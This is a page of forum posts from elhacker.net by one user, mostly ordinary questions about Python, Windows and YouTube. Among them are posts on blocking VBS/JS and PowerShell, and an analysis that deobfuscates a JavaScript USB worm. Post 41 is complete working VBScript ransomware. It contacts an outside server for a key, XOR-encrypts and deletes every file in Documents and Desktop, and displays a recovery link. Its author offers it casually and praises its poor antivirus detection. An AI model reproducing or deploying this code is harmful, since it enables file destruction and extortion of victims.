elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
41  Seguridad Informática / Análisis y Diseño de Malware / Codigo De Ransomware en VBScript por Flamer en: 28 Noviembre 2016, 20:18 pm
Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código
  1. option explicit
  2. dim shell,fso,document,f,password,desktop,id
  3.  
  4. set shell = createobject("wscript.shell")
  5. set fso = createobject("scripting.filesystemobject")
  6.  
  7. document = shell.SpecialFolders("MyDocuments")
  8. desktop = shell.SpecialFolders("Desktop")
  9.  
  10. set f = fso.getfolder(document)
  11. id = f.drive.serialnumber
  12.  
  13. password = Contrasena(id)
  14.  
  15. cifrar(document)
  16. cifrar(desktop)
  17.  
  18. msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"
  19.  
  20. function Contrasena(id)
  21.  dim objhttp
  22.  Set objhttp = createobject("Microsoft.XmlHttp")
  23.  
  24.  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  25.  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  26.  objhttp.send "id=" & id
  27.  
  28.  Contrasena = objhttp.responsetext
  29. end function
  30.  
  31. function cifrar(ruta)
  32.   dim carpeta,listfiles,listfolders,f
  33.  
  34.   set carpeta = fso.getfolder(ruta)
  35.   set listfolders = carpeta.subfolders
  36.   set listfiles = carpeta.files
  37.  
  38.   for each f in listfiles
  39.      archivo(f.path)
  40.   next
  41.  
  42.   for each f in listfolders
  43.      cifrar(f.path)
  44.   next  
  45. end function
  46.  
  47. function archivo(path)
  48.   dim file,largo,i,f,b,p,n
  49.  
  50.   set file = fso.getfile(path)
  51.  
  52.   largo=file.size
  53.  
  54.   set f = file.OpenAsTextStream()
  55.   redim bytes(largo)
  56.  
  57.   n = 1
  58.  
  59.   for i=0 to largo - 1
  60.      if n = len(password) then
  61.     n = 1
  62.  else
  63.         n = n + 1  
  64.      end if  
  65.  p = asc(mid(password,n,1))
  66.      b = asc(f.read(1)) xor p
  67.  bytes(i) = chr(b)
  68.   next
  69.  
  70.   f.close  
  71.  
  72.   set f = fso.createtextfile(file.path & ".crypt")
  73.  
  74.   for n = 0 to i - 1
  75.      f.write(bytes(n))
  76.   next
  77.  
  78.   f.close
  79.   file.delete
  80. end function
  81.  
  82.  


saludos Flamer
42  Foros Generales / Dudas Generales / data base de password mysql en: 19 Noviembre 2016, 02:36 am
hola navegando en internet encontré esto:

http://www.mysql-password.com/database/200308

alguien de ustedes ya la había visitado o sabían algo

saludos flamer
43  Programación / Scripting / Error con la funcion ord en Python en: 14 Noviembre 2016, 23:55 pm
hola soy nuevo en este tema de python he reducido mi programa hasta llegar a tener una sola linea que es la que me marca el error esta

Código
  1. print ord("A")
  2.  

hay me deberá de imprimir el 65 pero en ves de eso me marca error no en tiendo el por que

saludos flamer y podría ser la version o no funsina la el comando ord en windows, aclaro nunca había usado python
44  Sistemas Operativos / Windows / Se apaga y prende la pantalla de mi pc en: 18 Septiembre 2016, 19:35 pm
hola amigos este tema lo expongo aquí porque el problema lo he estado presentando desde que actualice el windows 10.

sucede que cada cierto tiempo ya sea una hora o 2 e incluso hay veces que a los 5 minutos sucede que se apaga como 2 segundos y vuelve a prender la pantalla, pero no se pierde nada, ni se cierra ningún programa sigo en el navegador u otro programa que este utilizando.

no se si sea fallo de hardware no lo creo, ya que esto me a estado sucediendo desde que actualice windows 10

saludos flamer y tal ves sea hardware ya que últimamente se me a ido mucho la luz, pero que se dañaria
45  Programación / Programación General / Crear una extensión punto Null en: 12 Septiembre 2016, 02:59 am
hola estoy tratando de crear un archivo similar a este


http://www.mediafire.com/download/qyors7vpzr9atju/flamer.rar

es la foto de flamer le he borrado la extensión y lo remplace por puntos y cuando la descomprimen se crea el archivo flamer.....

y mi pregunta es como logro hacer el archivo flamer......    sin nesesidad del winrar y en un lenguaje de programación

intente esto en vb.net
Código
  1. FileCopy("e:\flamer.jpg", "e:\flamer....")
  2.  

pero nada

saludos

46  Seguridad Informática / Seguridad / Como Deshabilitar Powershell En Windows 10 en: 10 Septiembre 2016, 01:13 am
hola amigos me e topado con un problema, es que hace poco publique en mi blog un articulo de como protegernos de los virus vbs y js donde explico como deshabilitar el wscript y de paso quise deshabilitar el powershell pero párese que este no hay forma de detenerlo y primero lo siguiente:

Cree la siguiente cadena en el registro
Código:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun, 1,REG_SZ,"powershell.exe"

con eso ya no se ejecuta powershell si ledas doble clic al EXE o si existe un acceso directo a el

pero si pones en el cmd

Código:
start powershell

o

Código:
powershell
este se lograba ejecutar.

pero para eso borre a powershell de las variables del sistema %PATH% y al querer ejecutar la sentencia anterior ahora si me decía acceso denegado.

hasta hay todo paresia bien, pero después me tope con otra cosa que si tecleas solo la ruta en el cmd de powershell este se logra ejecutar

Código:
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

ya intente denegar permisos, directamente desde el archivo y no pude modificar nada.

luego lo intente con el comando icacls ejecutando el cmd como administrador tampoco tuve éxito me dice acceso denegado


Nota: es solo para probar si se puede deshabilitar

saludos Flamer y alguna opción tengo windows 10
47  Foros Generales / Dudas Generales / usar correo gmail para que otros envien mail desde ella en: 7 Septiembre 2016, 21:17 pm
Hola compañeros tengo una duda y el problema es este.

quiero poner un formulario así en mi blog



y crear 1 o 2 cuentas de correo de gmail y que los usuarios puedan mandar mail desde ella

mi pregunta es que si no me bloquearan las cuentas o me cierren el blog

saludos Flamer y no se preocupen de como lo voy hacer
48  Seguridad Informática / Análisis y Diseño de Malware / Impedir La Ejecucion De VBS y JS en: 7 Septiembre 2016, 00:30 am
hola compañeros me surgió una duda ya que como hay muchos malwares en formatos vbs y js, mi pregunta es que tan importante es el archivo Wscript.exe de windows ya que he leído que se puede impedir la ejecución de estos archivos modificando el registro

Código:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings

y creamos una nuevo valor de cadena llamado Enabled=0

pero mi duda es que impacto tendria en el usuario, en el sistema no creo que suseda mucho.

pero al usuario se le limitarían muchas o pocas cosas

saludos
49  Seguridad Informática / Análisis y Diseño de Malware / Analizando El Virus Worm:JS/Bonda Que Se Propaga Por USB en: 1 Septiembre 2016, 18:26 pm
Ase poco un amigo me presto su USB para pasarle unos archivos y al ponerla en mi computadora me salto el antivirus y era por que tenia varios accesos directos en ella, bueno decidí  he charle manos a la obra y busque la ubicación del virus en la memoria para ver si podía jugar un rato con el y descubrí que era un archivo .js , orale dije ya dejaron de usar el vbscript y se cambiaron a javascript jajajaja.

yo pienso que se cambiaron para hacer las cosas un poco mas difíciles y si mi fuerte no es javascript pero verde no estoy, así que decidí abrir el archivo con el notepad++ (Descargar aquí sino lo tienen: https://notepad-plus-plus.org/ ) y esto fue lo que me encontre:

http://paste.ofcode.org/h4iyPUuPn5xMWsrbvPLijy

al verlo me pareció complicado de entender pero después de un rato di con el truco.
remplace las ultimas lineas por estas:

Código
  1. var P = this, r = String, N = "\len\gt\h";
  2. var e = function(l) {
  3.  return parseInt(l, 31)
  4. }, p = function (S) {
  5.  return e(S[0]) ^ e(S[1])
  6. };
  7. var v = [];
  8. var z = "";
  9. var Q = "fr\o\m\C\h\ar\C\o\d\e";
  10. for (var y = 0; y < b[N] / 3; y++) v[y] = "";
  11. for (var S = 0; S < b[N]; S++) v[Math.floor(S / 3)] += b[S];
  12. for (var J = 0; J < v[N];) z +=  String.fromCharCode(p([v[J++], v[J++]]));
  13.  
  14.  
  15. var fso  = new ActiveXObject("Scripting.FileSystemObject");
  16. var fh = fso.CreateTextFile("Test.js", true);
  17. fh.WriteLine(z);
  18. fh.Close();
  19. //P["\Fun\ct\i\on"](z)();
  20.  

la ultima linea que puse como comentario es la que ejecutaba todo el código desde una función, así que la deje como comentario y la variable z es la que portaba todo el código ya descifrado y para no desaprovechar el contenido de la variable z cree un archivo llamado Test.js para que se aguardara el código en el cuando se ejecutara.

al ejecutar el script me creo el archivo Test.js con todo el código descifrado, pero con la diferencia de que todo estaba desordenado, así que me fui a una pagina para que me lo ordenara un poco esta es la web:

http://jsbeautifier.org/

solo pegue el código y le di clic al boton   Beautify javascript or HTML

y el resultado fue este:

http://paste.ofcode.org/5JWR5RLzh5ZkcLixGgLuBb

bueno  hay que remplazar unas comas por punto y coma, no esta al  %100 pero estaba peor y como dije el jscript no es mi fuerte así que no lo explicare ya que hay muchas cosas que no entiendo.

bueno saludo Flamer y espero le sirva a alguien



50  Foros Generales / Foro Libre / Error en youtube o soy yo en: 20 Julio 2016, 00:46 am
hola amigos solo vengo de paso y no entiendo que esta mal bueno primero antes que nada aquí el canal de youtube

https://www.youtube.com/channel/UCQpNu7s6Gb1eG8tuNylXKQA/videos?shelf_id=0&view=0&sort=dd

ahora seleccionen cualquier vídeo y luego solo den hacia atrás y seleccionen otro nuevo

y díganme si les a párese el mismo vídeo

creo que cambiaron el video original por ese mismo ya que el enlace no es el mismo pero el video si

saludos flamer y hackearian ese canal o es mi pc pero ya borre todo el historial



Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines